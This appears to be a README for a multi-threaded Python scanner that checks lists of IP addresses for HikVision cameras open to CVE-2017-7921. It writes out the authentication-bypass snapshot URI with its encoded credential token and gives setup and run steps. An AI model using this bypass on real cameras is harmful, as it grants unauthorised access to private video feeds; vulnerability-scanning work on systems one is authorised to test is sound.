
Multi-threaded scanner to identify HikVision cameras vulnerable to CVE-2017-7921 by testing the ONVIF snapshot endpoint for unauthorized access.
Identify potential vulnerabilities with CVE-2017-7921 exploit checks or by testing the /onvif-http/snapshot?auth=YWRtaW46MTEK URI on target IP addresses using a multi-threaded approach for faster results.
python3
Python Pacakges => requests, Fake_useragent, colorama
You can just install the dependencies using pip: pip install -r requirements.txt If you prefer to manually install the required packages, you can use the
pip installcommand followed by the package names listed inrequirements.txt.
[!TIP] Ensure Python 3 is installed and added to your system path.
cd /HikVision-CVE-2017-7921
pip3 install -r requirements.txt
Add ips to targets.txt and then
python3 main.py
Then Check; vulnerable.txt

Report any problems you find or suggest features you'd like to see. Telegram : @uz3er Telegram Channel: @undergroundcy